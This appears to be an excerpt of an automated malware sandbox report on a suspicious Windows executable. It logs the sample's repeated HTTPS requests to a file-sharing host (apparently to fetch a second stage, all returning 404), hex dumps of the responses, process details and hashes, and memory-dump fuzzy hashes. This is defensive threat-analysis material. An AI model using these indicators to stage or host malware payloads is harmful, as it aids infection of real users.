                                          Date: Tue, 10 Dec 2024 15:30:22 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:22 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          61192.168.2.849777194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:30:24 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:25 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:25 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:25 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          62192.168.2.849778194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:30:27 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:28 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:28 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:28 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          63192.168.2.849779194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:30:30 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:30:31 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:30:31 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:30:31 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Target ID:0
                                          Start time:10:27:22
                                          Start date:10/12/2024
                                          Path:C:\Users\user\Desktop\Ref_31020563.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Ref_31020563.exe"
                                          Imagebase:0x9c0000
                                          File size:180'704 bytes
                                          MD5 hash:7C8431A3C14296CFF7381CC69B61BAD8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          Reset < >
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3283381318.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1220000_Ref_31020563.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 854a87a495db8338249868d9f1c454a1ccd6f570e07219c5dbd63aa85b9d7ce6
                                            • Instruction ID: 5e9ade7e235983cc5bc8d0939ba2faaa2fff3e00ae7c423c1a1b02acaa1aebe4
                                            • Opcode Fuzzy Hash: 854a87a495db8338249868d9f1c454a1ccd6f570e07219c5dbd63aa85b9d7ce6
                                            • Instruction Fuzzy Hash: 1D216B30B101189FDB04DB78C958BADBBF2AF8C700F158469E406AB3A1CB719D45CBA4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3283381318.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1220000_Ref_31020563.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 16ed8a601d9e111f3621987c1028289ba6f32058890ec9d5f0c34ad0075ebb59
                                            • Instruction ID: c3e0c604aa920d474cd050829b80e3c88fd094f5902e308e5beab4bcd66750ab
                                            • Opcode Fuzzy Hash: 16ed8a601d9e111f3621987c1028289ba6f32058890ec9d5f0c34ad0075ebb59
                                            • Instruction Fuzzy Hash: B9213A31B10129DFDB04EB69C558BAD7BF2AF8C700F218469E506BB3A0DB759C40CBA4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3283381318.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1220000_Ref_31020563.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c9166faffa4b30cb0adff4fcc4c67f02ea30026c5ce643781cd4e131b60c881
                                            • Instruction ID: 0bd3525f75639070ef135841f52f1344a94f23ebf40175416a65af0af5d31e52
                                            • Opcode Fuzzy Hash: 6c9166faffa4b30cb0adff4fcc4c67f02ea30026c5ce643781cd4e131b60c881
                                            • Instruction Fuzzy Hash: 91F0F6357082548FC704CBB8E854A6E3FB1BFCA610B2505FAE545CB3A2DB61CC01C7A1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3283381318.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1220000_Ref_31020563.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df5fe0cb2d32c86b1aee34fc5dc066b4d0673b0b393160ca5040e73173071897
                                            • Instruction ID: 1814a14e61ed72678744e92eab7efca2c0431e80e406486ea7be311e94c4d29f
                                            • Opcode Fuzzy Hash: df5fe0cb2d32c86b1aee34fc5dc066b4d0673b0b393160ca5040e73173071897
                                            • Instruction Fuzzy Hash: 03F037357002149FC714DB79E844E6A3BE6FBCD765B2104A5F505CB365DE71DC0187A1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3283381318.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1220000_Ref_31020563.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b292a690ab80423c16f48877096ed54381c5260df00b9d67a22e5b2d4398b254
                                            • Instruction ID: 1a6bd83c04d5985de9b39f3534ba2a56fc74463c2ec8e61c9ba1bde4989c5fc8
                                            • Opcode Fuzzy Hash: b292a690ab80423c16f48877096ed54381c5260df00b9d67a22e5b2d4398b254
                                            • Instruction Fuzzy Hash: E7D097347450904FCB028778EC04A983BBAAF8A200B0001F6E40ACB3B3CA60CC038B81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.3283381318.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_1220000_Ref_31020563.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0c80da1ce97b45787cec56f1ca4a017a2391139382f6c59e0bf2f507f99851be
                                            • Instruction ID: 672688eb049a17aa154b109089517aed7b25a533f661ac89c5a8824f46af6fcf
                                            • Opcode Fuzzy Hash: 0c80da1ce97b45787cec56f1ca4a017a2391139382f6c59e0bf2f507f99851be
                                            • Instruction Fuzzy Hash: D4B0121540F1C507CB0281E00C302D86F712CC15103AF06FEC8E08328BD65C5025F342